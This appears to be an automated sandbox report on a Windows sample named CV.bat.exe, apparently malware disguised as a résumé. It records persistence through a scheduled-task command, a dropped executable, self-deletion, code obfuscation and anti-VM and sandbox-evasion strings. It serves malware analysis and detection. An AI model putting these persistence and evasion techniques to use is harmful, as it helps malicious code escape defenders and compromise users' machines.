Source: CV.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: CV.bat.exe, CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: CV.bat.exe, NetworkArithmeticGame/Form1.cs .Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: PzKpucfDtCCmww.exe.0.dr, NetworkArithmeticGame/Form1.cs .Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.CV.bat.exe.430000.0.unpack, NetworkArithmeticGame/Form1.cs .Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0129D0D1 push ecx; ret 8_2_0129D0E4
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0042125C push eax; ret 8_2_004212AF
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0040C21E push esp; retf 8_2_0040C226
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004212A9 push eax; ret 8_2_004212AF
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004212B2 push eax; ret 8_2_00421319
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_00421313 push eax; ret 8_2_00421319
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004223AD push ecx; retf 8_2_004223AE
Drops PE files
Source: C:\Users\user\Desktop\CV.bat.exe File created: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\chkdsk.exe File deleted: c:\users\user\desktop\cv.bat.exe Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CV.bat.exe PID: 6056, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\CV.bat.exe TID: 6044 Thread sleep time: -41226s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe TID: 6036 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01286DE6 rdtsc 8_2_01286DE6
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\CV.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9452 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\CV.bat.exe API coverage: 8.8 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Thread delayed: delay time: 41226 Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\6HARDWARE\Description\System"SystemBiosVersionTSOFTWARE\Oracle\VirtualBox Guest Additions
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: CV.bat.exe, 00000000.00000002.299464091.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 0000000D.00000000.396822485.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.368187868.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 0000000D.00000000.360030003.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000D.00000000.368187868.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01286DE6 rdtsc 8_2_01286DE6
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01318D34 mov eax, dword ptr fs:[00000030h] 8_2_01318D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h] 8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h] 8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h] 8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h] 8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01264120 mov ecx, dword ptr fs:[00000030h] 8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130E539 mov eax, dword ptr fs:[00000030h] 8_2_0130E539
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h] 8_2_01253D34
